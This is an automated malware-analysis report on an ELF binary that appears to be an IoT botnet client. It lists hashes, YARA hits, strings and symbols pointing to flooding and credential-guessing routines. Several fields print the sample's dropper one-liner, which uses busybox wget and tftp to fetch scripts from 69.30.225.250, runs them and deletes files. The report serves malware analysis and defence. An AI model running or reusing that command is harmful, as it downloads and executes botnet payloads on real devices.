Report #3390 check_circle

Binary
ABI
ELFOSABI_SYSV
Size
156.05KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
9424e71e89434982f44698d94d527418
sha1
858d95250bf1252af5045cebd35f0e9a0e947078
crc32
0x44d54893
sha224
bd7faacd3b0eadfe7a3fecb3973d46e7c6787c602c5502eb5dc3d715
sha256
0153c04c2a6e96149211f206ca0b96d9b9a6c17224992f349b3d6f13bb7406e2
sha384
8a9c54fc921b2351ec394eae1d64e86b153340b5b87f4dd546f7857ae9985c8cfef016042e795936a53c66392722b96c
sha512
3d39172e115722ae4a27d21c05e4bf870db2f14a8c8ac49658154a35da6b1b780805a1f7623fabbc739f494fb8a5dc2c9f757fa202a118280d1906d9f67f5388
ssdeep
3072:rwWXWxVPKJVjvWW6odLqIZtxjnN6yy1PglYWBH3mvcL48/PYalXTuHdTH:kmmVPKJVjvWWjZjnvy1oqKmvcL48/PYt
Community
Google
True check_circle
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
69.30.225.250:145, cd /tmp || cd /var/run; busybox wget http://69.30.225.250/bash.sh; sh bash.sh; busybox tftp 69.30.225.250 -c get t.sh; sh t.sh; busybox tftp -r t2.sh -g 69.30.225.250;sh t2.sh;rm t2.sh;rm -f *
URLs
cd /tmp || cd /var/run; busybox wget http://69.30.225.250/bash.sh; sh bash.sh; busybox tftp 69.30.225.250 -c get t.sh; sh t.sh; busybox tftp -r t2.sh -g 69.30.225.250;sh t2.sh;rm t2.sh;rm -f *
Mails

Suspicious
True check_circle
Strings
List
cd /tmp || cd /var/run; busybox wget http://69.30.225.250/bash.sh; sh bash.sh; busybox tftp 69.30.225.250 -c get t.sh; sh t.sh; busybox tftp -r t2.sh -g 69.30.225.250;sh t2.sh;rm t2.sh;rm -f *
69.30.225.250:145
__rpc_thread_destroy
__pthread_mutex_destroy
__new_sem_destroy
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
__pthread_mutexattr_destroy
pthread_attr_destroy
pthread_mutexattr_destroy
None Killed.
sem_destroy
clntudp_destroy
RPC: Unknown host
Network is down
Machine is not on the network
Killed %d.
No route to host
Host is down
been_there_done_that.3001
__pthread_mutexattr_setpshared
pthread_mutexattr_setpshared
been_there_done_that
_fwrite.c
open.c
join.c
xdr_des_block
write.c
pread_write.c
pthread_mutex_destroy
(unknown authentication error - %d)
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files
Too many open files in system
pass
Connection reset by peer
No such device
Link has been severed
Is a named type file
Object is remote
Too many links
RPC: Server can't decode arguments
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
Operation not permitted
; errno = %s
My IP: %s
Invalid flag "%s"
bad auth_len gid %d str %d auth %d
dnslookup.c
Too many users
__GI_execl
__pthread_threads_debug
__GI_pthread_attr_destroy
__dns_lookup
__pthread_manager_event
__pthread_manager_thread
__pthread_manager_reader
__GI_fflush_unlocked
__pthread_manager_request
__GI_pthread_condattr_destroy
PONG!
__GI_xprt_unregister
__pthread_manager
/etc/config/hosts
__pthread_manager_thread_tos
__pthread_manager_thread_bos
__pthread_kill_other_threads_np
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
pthread_condattr_destroy
pthread_cond_destroy
__GI__authenticate
authnone_destroy
__GI_execve
__register_frame_info_bases
/etc/hosts
__GI_pipe
pthread_kill_all_threads
_Jv_RegisterClasses
manager.c
xdrmem_destroy
__deregister_frame_info_bases
pthread_kill
gethostbyname_r
xprt_unregister
opennameservers.c
daemon.c
__GI_xprt_register
fflush_unlocked.c
__GI_nanosleep

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, trigger, c, Q, i.4252, printchar, prints, printi, print, fdopen_pids, hextable, ipState, errno.c, thread_self, manager.c, terminated_children, main_thread_exiting, pthread_kill_all_threads, pthread_start_thread, pthread_start_thread_event, pthread_free, restart, pthread_reap_children, pthread_threads_counter, ptfork.c, pthread_insert_list, pthread_call_handlers, pthread_atfork_lock, pthread_atfork_prepare, pthread_atfork_child, pthread_atfork_parent, semaphore.c, enqueue, remove_from_queue, __pthread_set_own_extricate_if, thread_self, new_sem_extricate_func, suspend, signals.c, pthread_null_sighandler, thread_self, pthread_sighandler_rt, sighandler, pthread_sighandler, spinlock.c, wait_node_dequeue, __pthread_acquire, wait_node_free, wait_node_free_list_spinlock, wait_node_free_list, restart, thread_self, suspend, wrapsyscall.c, pthread.c, current_rtmin, current_rtmax, pthread_handle_sigdebug, current_level, suspend, thread_self, pthread_onexit_process, pthread_initialize, pthread_handle_sigrestart, pthread_handle_sigcancel, __libc_multiple_threads_ptr, attr.c, cancel.c, thread_self, condvar.c, enqueue, remove_from_queue, __pthread_set_own_extricate_if, restart, thread_self, cond_extricate_func, suspend, events.c, join.c, __pthread_set_own_extricate_if, thread_self, join_extricate_func, suspend, lockfile.c, mutex.c, __pthread_trylock, __pthread_alt_trylock, once_masterlock, once_finished, fork_generation, thread_self, pthread_once_cancelhandler, ptlongjmp.c, pthread_cleanup_upto, specific.c, thread_self, pthread_keys, pthread_keys_mutex, sigaction.c, __restore_rt, __restore, libc/sysdeps/linux/i386/clone.S, __error, libc/sysdeps/linux/i386/setjmp.S, libc/sysdeps/linux/i386/mmap.S, __syscall_fcntl.c, __syscall_fcntl64.c, __syscall_rt_sigaction.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, fsync.c, getdtablesize.c, geteuid.c, getpagesize.c, getpid.c, getppid.c, getrlimit.c, gettimeofday.c, kill.c, llseek.c, longjmp.c, lseek.c, msync.c, munmap.c, nanosleep.c, open.c, open64.c, pause.c, pipe.c, poll.c, pread_write.c, __fake_pread_write64, __fake_pread_write, read.c, sched_get_priority_max.c, sched_get_priority_min.c, sched_getparam.c, sched_getscheduler.c, sched_setscheduler.c, sched_yield.c, select.c, setrlimit.c, setsid.c, sigprocmask.c, sigsuspend.c, time.c, wait.c, wait4.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, errno.c, puts.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, fputc_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strstr.c, strtok.c, next_start.1278, isatty.c, tcdrain.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, accept.c, connect.c, getsockopt.c, recv.c, recvfrom.c, recvmsg.c, send.c, sendmsg.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigdelset.c, sigempty.c, sigfillset.c, sigismem.c, sigjmp.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, calloc.c, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, on_exit.c, daemon.c, execl.c, sleep.c, sysconf.c, libc_pthread_init.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, rpc_thread.c, rpc_thread_multi, __libc_tsd_RPC_VARS_mem, once.5915, __syscall_error.c, libc/sysdeps/linux/i386/__longjmp.S, libc/sysdeps/linux/i386/vfork.S, __socketcall.c, clock_getres.c, execve.c, getegid.c, getgid.c, getuid.c, ioctl.c, sbrk.c, _WRITE.c, _fwrite.c, _trans2w.c, _uintmaxtostr.c, memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, clnt_simple.c, clnt_udp.c, clntudp_geterr, clntudp_freeres, clntudp_abort, clntudp_control, udp_ops, clntudp_destroy, clntudp_call, create_xid.c, mylock, is_initialized, __rpc_lrand48_data, pm_getport.c, timeout, tottimeout, pmap_prot.c, rpc_commondata.c, rpc_prot.c, reply_dscrm, svc.c, svc_find, svc_auth.c, svcauthsw, _svcauth_null, svc_authux.c, xdr.c, crud.3487, xdr_zero, xdr_mem.c, xdrmem_ops, xdrmem_destroy, xdrmem_getpos, xdrmem_setpos, xdrmem_inline, xdrmem_putint32, xdrmem_getint32, xdrmem_putlong, xdrmem_getlong, xdrmem_putbytes, xdrmem_getbytes, inet_aton.c, gethostbyname_r.c, realloc.c, lrand48_r.c, nrand48_r.c, srand48_r.c, __exit_handler.c, dl-support.c, brk.c, cmsg_nxthdr.c, mremap.c, fseeko.c, printf.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, vfprintf.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs.c, memmove.c, strcmp.c, strnlen.c, memcmp.c, memcmp_bytes, rawmemchr.c, strspn.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, ffs.c, auth_none.c, authnone_verf, authnone_validate, authnone_refresh, authnone_destroy, authnone_marshal, ops, authunix_prot.c, bindresvport.c, port.2516, pmap_clnt.c, __get_myaddress, timeout, tottimeout, rpc_dtablesize.c, size.4051, xdr_array.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, bind.c, drand48-iter.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, fclose.c, fopen.c, perror.c, fprintf.c, _fopen.c, _load_inttype.c, _store_inttype.c, _fpmaxtostr.c, fmt, exp10_table, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strncat.c, strdup.c, clnt_perror.c, rpc_errlist, rpc_errstr, free_mem, _buf, auth_errlist, auth_errstr, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, tolower.c, __C_ctype_tolower.c, sprintf.c, vsnprintf.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, longjmp, __libc_tcdrain, __linuxthreads_pthread_threads_max, __GI_pthread_attr_getdetachstate, __GI_execve, __libc_sigaction, __libc_pread, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, xdr_longlong_t, bcmp, __GI_memchr, __GI_pthread_attr_setdetachstate, __GI___glibc_strerror_r, pthread_mutex_timedlock, waitpid, __longjmp, __libc_fsync, __open_nameservers, __GI_fopen, xprt_register, getrlimit, ioctl, pause, pthread_cond_signal, _stdio_openlist_use_count, __pthread_mutexattr_destroy, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_xdrmem_create, __GI_time, getgid, __pthread_exit_code, printf, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, lrand48_r, getdtablesize, __GI_h_errno, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __pthread_restart_new, __GI_tolower, pthread_mutexattr_gettype, putc_unlocked, pthread_attr_destroy, recv, connect, __linuxthreads_initial_report_events, __encode_question, svcerr_auth, __GI___uClibc_fini, numpids, __encode_header, pthread_attr_getstacksize, __GI_strncat, __pthread_once, pthread_create, sigemptyset, __pthread_mutex_lock, pthread_getspecific, __new_sem_destroy, initConnection, __sigdelset, __GI_clock_getres, __GI_pthread_attr_init, __GI_svc_register, __pthread_find_self, __uClibc_fini, memrchr, geteuid, __rpc_thread_svc_cleanup, inet_pton, __GI_vsnprintf, pthread_attr_init, __GI_pthread_setcanceltype, __GI_setsid, pthread_mutexattr_getkind_np, __GI_sigsuspend, memmove, sendTCP, pthread_exit, __bsd_signal, sem_timedwait, __GI_strpbrk, pmap_set, __stdio_trans2r_o, __GI_setsockopt, munmap, __libc_stack_end, __pthread_manager_thread_bos, sched_getparam, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, _longjmp, __exit_function_table, __GI_xdr_pmap, pthread_condattr_setpshared, xdrmem_create, __libc_fcntl, atol, _h_errno, xdr_des_block, __new_sem_init, getRandomPublicIP, xdr_opaque_auth, getc_unlocked, clnt_spcreateerror, __ctype_b, __pthread_manager_event, __GI_random_r, __fresetlockfiles, usernames, clnt_perrno, pwrite64, __GI___longjmp, __pthread_mutexattr_settype, errno, getegid, __GI_pthread_attr_getschedparam, __linuxthreads_create_event, __GI_clnt_sperror, __GI_sbrk, zprintf, __libc_accept, __GI___uClibc_init, _create_xid, __exit_handler, execve, __libc_current_sigrtmax, __GI_pthread_condattr_destroy, __libc_pwrite64, pthread_condattr_init, getpagesize, getpid, pthread_attr_getstackaddr, xdr_u_hyper, __pthread_suspend, setstate_r, __GI_lseek64, fgets, getHost, __libc_getpid, wildString, pthread_key_delete, __GI_pthread_attr_setschedparam, __xpg_strerror_r, __GI___rpc_thread_svc_fdset, _pthread_cleanup_pop, fcntl64, __pthread_lock, memcpy, __GI_svc_getreq, pthread_cancel, makeRandomStr, pmap_getport, getRandomIP, __GI_fputs_unlocked, execl, __pthread_mutexattr_setpshared, __GI_fgets, __pthread_initial_thread_bos, svc_sendreply, perror, pthread_mutexattr_destroy, _rpc_dtablesize, __pthread_reset_main_thread, creat, _stdio_openlist_dec_use, sclose, __libc_select, __pthread_do_exit, pthread_equal, _ppfs_init, __GI_memcmp, puts, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, __libc_current_sigrtmin, __pthread_sig_debug, sem_destroy, __GI__seterr_reply, tolower, getuid, __GI_xdr_string, system, __open_etc_hosts, __rpc_thread_svc_max_pollfd, __GI_xprt_register, __pthread_cleanup_push_defer, malloc, isatty, __GI_pthread_cond_timedwait, siglongjmp, pthread_attr_getscope, __GI_pmap_unset, sleep, __GI_atol, sched_setscheduler, __new_sem_post, __pthread_initialize_manager, vsnprintf, __dns_lookup, __GI_read, recvfrom, sem_wait, xdr_bytes, svcerr_decode, tcdrain, __C_ctype_tolower, pthread_attr_getguardsize, random_r, __libc_longjmp, __dso_handle, sem_post, sched_getscheduler, __new_exitfn, clock_getres, pthread_testcancel, __pthread_manager_sighandler, __libc_pthread_init, gethostbyname_r, __pthread_attr_getstackaddr, tcpcsum, __linuxthreads_death_event, __linuxthreads_version, fdpclose, __GI_pthread_attr_destroy, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, __GI_accept, clnt_perror, __pthread_attr_setstacksize, isspace, pthread_attr_getinheritsched, __stdio_seek, __linuxthreads_pthread_keys_max, pthread_kill_other_threads_np, mempcpy, __GI_strcoll, __GI_write, __pthread_mutexattr_gettype, xdr_void, sem_unlink, __ctype_toupper, __libc_pwrite, __libc_read, xdr_pmap, svcerr_progvers, __GI_xdr_accepted_reply, _string_syserrmsgs, svcerr_noproc, __pthread_kill_other_threads_np, __GI_open, __GI_strchr, __searchdomain, __pthread_initialize, __GI_xdr_rejected_reply, __pthread_mutexattr_setkind_np, lseek, __GI_clnt_perror, sigaddset, __linuxthreads_pthread_key_2ndlevel_size, __GI_tcgetattr, __environ, mmap, xdr_vector, __GI_clntudp_create, __pthread_alt_unlock, svc_getreq_common, wcsnrtombs, pthread_detach, makeIPPacket, sockprintf, __GI_inet_ntoa, send, svc_getreq, __fgetc_unlocked, __GI_clnt_spcreateerror, abort, nrand48_r, xprt_unregister, pthread_attr_getschedpolicy, __sigjmp_save, __libc_drand48_data, __pthread_handles, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __libc_tsd_RPC_VARS_data, __GI_getgid, srandom_r, __GI_fputs, xdr_char, _init, __GI_setrlimit, clnt_pcreateerror, __GI_inet_ntoa_r, __GI_setstate_r, pthread_attr_setstackaddr, parseHex, strtol, __sigsetjmp, pipe, __libc_lseek64, __GI_pthread_getschedparam, _svcauth_unix, strnlen, rawmemchr, __GI_mempcpy, accept, __libc_allocate_rtsig, __malloc_state, pthread_getschedparam, __GI___C_ctype_b_data, __libc_pread64, __GI_xdr_replymsg, __GI_lrand48_r, __sigaddset, __GI_xdr_authunix_parms, pthread_setcancelstate, xdr_union, __pthread_functions, nanosleep, __GI_send, __pthread_wait_for_restart_signal, xdr_enum, h_errno, calloc, __GI_svcerr_auth, xdr_bool, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, setrlimit, csum, __GI_xdr_long, __exit_cleanup, xdr_wrapstring, xdr_rejected_reply, __GI___rpc_thread_createerr, __GI_execl, __GI_srandom_r, pthread_condattr_destroy, __GI___ctype_tolower, pthread_attr_setscope, write, __rpc_thread_variables, environ, __GI_close, xdr_free, xdr_netobj, fprintf, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, __pthread_destroy_specifics, ffs, svc_register, xdr_long, pthread_mutexattr_setkind_np, __GI_svcerr_decode, __GI_brk, bind, _svcauth_short, __GI_nanosleep, __GI_strtok, svcerr_systemerr, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, __pthread_nonstandard_stacks, __GI_clntudp_bufcreate, __GI___libc_open64, pthread_cond_broadcast, pthread_once, __pthread_once_fork_child, ourIP, chdir, pthread_attr_setinheritsched, __pthread_alt_lock, pmap_unset, __pthread_manager_adjust_prio, fseeko, _stdio_openlist_del_count, connectTimeout, __pthread_manager_thread, __pthread_setconcurrency, setsockopt, xdr_short, bsd_signal, fseek, mremap, pthread_setschedparam, __GI_kill, __GI_strcmp, svc_getreqset, __GI_memmove, setstate, __decode_dotted, __GI_pthread_cond_broadcast, __pthread_perform_cleanup, __stdio_READ, pthread_key_create, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, svc_getreq_poll, __stdin, stdin, __GI_clnt_sperrno, __new_sem_wait, wait, xdr_accepted_reply, __GI_isatty, __libc_open64, pthread_setconcurrency, sem_init, svcerr_weakauth, xdr_authunix_parms, __pthread_mutex_destroy, __pthread_mutexattr_getkind_np, __pthread_handles_num, _start, sem_close, __deregister_frame_info_bases, __GI_xdr_opaque_auth, strstr, __GI_ioctl, xdr_u_longlong_t, init_rand, rand, pthread_kill, signal, read, __GI_xdr_int, __pthread_manager_request, __pthread_internal_tsd_get, __decode_header, pread64, __linuxthreads_pthread_sizeof_descr, pthread_attr_setstacksize, getCores, __GI___h_errno_location, xdr_u_char, __GI_memcpy, sendmsg, strcoll, clntudp_create, __GI_xdr_callhdr, wcsrtombs, _stdio_user_locking, __pthread_internal_tsd_address, __cmsg_nxthdr, __GI_svcerr_noprog, __GI_sigdelset, strncpy, strcasecmp, htonl, sendto, __exit_count, xdr_u_long, __C_ctype_toupper, __GI_open64, StartTheLelz, sched_get_priority_max, __GI___C_ctype_b, xdr_replymsg, pthread_sigmask, realloc, on_exit, __libc_siglongjmp, __GI_gethostbyname_r, __GI_pthread_cond_signal, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __pthread_attr_setstackaddr, __GI___C_ctype_tolower, __GI_recvfrom, pthread_cond_init, __GI_getrlimit, __GI_strcpy, __GI_inet_ntop, strtok, __GI___fputc_unlocked, sigfillset, memcmp, svcerr_noprog, sched_get_priority_min, __stdio_adjust_position, xdr_opaque, malloc_trim, _vfprintf_internal, __GI_poll, __GI_nrand48_r, fork, __pthread_restart, __GI_pthread_attr_setschedpolicy, pthread_mutexattr_getpshared, __GI_pthread_attr_setinheritsched, __stdio_rfill, strncat, __GI_pthread_attr_getscope, __GI_bindresvport, gotIP, __libc_pause, sem_trywait, __GI_sleep, sigaction, _dl_phdr, __pthread_mutexattr_init, __GI_svc_sendreply, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, xdr_callhdr, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __GI_mremap, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_svcerr_progvers, __GI_fork, strdup, __libc_close, __pthread_internal_tsd_set, __GI_getpid, inet_aton, pthread_condattr_getpshared, index, _pthread_cleanup_push_defer, processCmd, __sigismember, gettimeofday, fopen, __bss_start, __GI_pthread_self, __libc_open, memset, __GI_socket, main, __GI___libc_lseek, __glibc_strerror_r, __GI_sigfillset, __rpc_thread_clnt_cleanup, listFork, __GI___C_ctype_tolower_data, __GI_xdr_union, __stdio_fwrite, negotiate, srand, __rpc_thread_svc_pollfd, initstate, fclose, __GI_pthread_attr_setscope, __syscall_rt_sigaction, open64, xdr_string, ntohs, pthread_mutexattr_settype, inet_ntoa, sendUDP, getppid, tcgetattr, __C_ctype_tolower_data, __libc_recvfrom, time, __pthread_threads_events, __libc_system, __GI_abort, pthread_mutexattr_setpshared, poll, __GI_pthread_cond_wait, __GI_pthread_cond_init, __GI_pthread_cond_destroy, __GI_xdr_u_short, xdr_u_int, fdpopen, __GI_fprintf, pthread_attr_getdetachstate, __pthread_last_event, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, __libc_recvmsg, strcmp, pthread_mutex_unlock, callrpc, __nameserver, data_start, _seterr_reply, __rpc_thread_svc_fdset, __GI_sysconf, __pthread_manager_reader, __pthread_initial_thread, __h_errno_location, __GI_putc_unlocked, __GI___rpc_thread_svc_pollfd, matchPrompt, __C_ctype_b_data, __GI_inet_pton, _stdio_fopen, __GI_xdr_u_hyper, __GI_pthread_setschedparam, _fini, __GI_xdr_opaque, __GI_chdir, authnone_create, __vfork, __GI_mmap, __GI_xdr_array, sprintf, __pthread_offsetof_descr, __new_sem_trywait, fdgets, msync, __get_pc_thunk_bx, strerror_r, __GI_ffs, __GI_select, __libc_waitpid, __pthread_unlock, __libc_multiple_threads, sem_open, __GI_xdr_bool, __rpc_thread_destroy, __GI_waitpid, __GI_xdr_u_int, __GI_vfprintf, __GI_xdr_enum, _stdio_term, __decode_answer, __GI_signal, __pthread_attr_setguardsize, stderr, __pthread_exit_requested, commServer, __pthread_attr_getguardsize, __pthread_manager_thread_tos, __GI_pthread_exit, vfork, __C_ctype_b, __pthread_once_fork_parent, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __GI_printf, __libc_fork, sigismember, __atexit_lock, scanPid, __linuxthreads_reap_event, fsync, rand_cmwc, __pthread_manager, __libc_lseek, __GI_xprt_unregister, clnt_sperror, __GI_pmap_set, __pthread_getconcurrency, __pthread_alt_timedlock, __libc_fcntl64, _pthread_cleanup_push, pread, pthread_self, pthread_setcanceltype, getsockopt, __GI_fseeko64, __pthread_once_fork_prepare, pthread_mutexattr_init, __libc_wait, fflush_unlocked, __stdio_wcommit, __exit_slots, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, __GI_recvmsg, __GI_pthread_attr_getschedpolicy, __drand48_iterate, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_xdr_u_long, __GI_strstr, __searchdomains, _end, bindresvport, __pthread_threads_max, htons, pthread_mutex_destroy, svc_fdset, __rpc_thread_createerr, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, pthread_mutex_lock, __GI_svc_getreq_common, __new_sem_getvalue, __GI_connect, __curbrk, sem_getvalue, __libc_poll, pthread_cond_wait, _dl_phnum, __GI_pthread_equal, _fpmaxtostr, svc_unregister, __errno_location, __pthread_timedsuspend, uppercase, __GI_pmap_getport, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, pthread_attr_setguardsize, __GI_geteuid, __GI_sendmsg, sigdelset, inet_ntop, brk, pthread_mutex_trylock, __GI_pthread_setcancelstate, _null_auth, pthread_atfork, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, __GI_perror, __libc_sendmsg, _errno, _authenticate, __GI_gettimeofday, atoi, _stdio_openlist_del_lock, pthread_cond_destroy, __GI_inet_aton, pthread_attr_setschedpolicy, __GI_svc_getreq_poll, fgets_unlocked, __pthread_mutexattr_getpshared, __GI_bind, _exit, szprintf, __pthread_timedsuspend_new, __pthread_sig_cancel, __GI_xdr_void, __GI_lseek, __pthread_sig_restart, strspn, __pthread_offsetof_pid, __libc_recv, __pthread_main_thread, daemon, pthread_mutex_init, __pthread_cleanup_pop_restore, __libc_creat, __pthread_attr_getstacksize, strlen, __GI___cmsg_nxthdr, lseek64, open, clone, xdr_array, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __fork, __libc_sendto, __stdio_trans2w_o, __GI_vfork, __GI__authenticate, strchr, __GI_rawmemchr, __GI_srand48_r, fputs, svc_max_pollfd, __GI_raise, pthread_attr_setschedparam, __data_start, __pthread_sizeof_handle, __pthread_provide_wrappers, setsid, __GI_inet_addr, __GI_svc_unregister, __GI_pthread_condattr_init, rpc_createerr, __libc_msync, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __pthread_threads_debug, pthread_attr_setdetachstate, recvmsg, fputc_unlocked, svc_pollfd, readUntil, __libc_sigsuspend, __GI_xdr_hyper, fcntl, __GI_xdr_bytes, sched_yield, pthread_join, __GI__rpc_dtablesize, pthread_getconcurrency, __GI_atoi, fseeko64, pthread_cond_timedwait, __GI_sprintf, clntudp_bufcreate, __ctype_tolower, __GI_svc_getreqset, __GI_pthread_attr_getinheritsched, sigwait, wcrtomb, __GI___rpc_thread_svc_max_pollfd, pwrite, close, __libc_connect, passwords, pthread_attr_getschedparam, srand48_r, __GI_strlen, sendHOLD, mainCommSock, pids, vfprintf, strpbrk, pthread_setspecific, xdr_int, xdr_hyper, getBogos, sigsuspend, _load_inttype, raise, clnt_sperrno, free, xdr_u_short, sigprocmask, __fputc_unlocked, __GI_authnone_create, __GI_xdr_short
Number
1360
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: 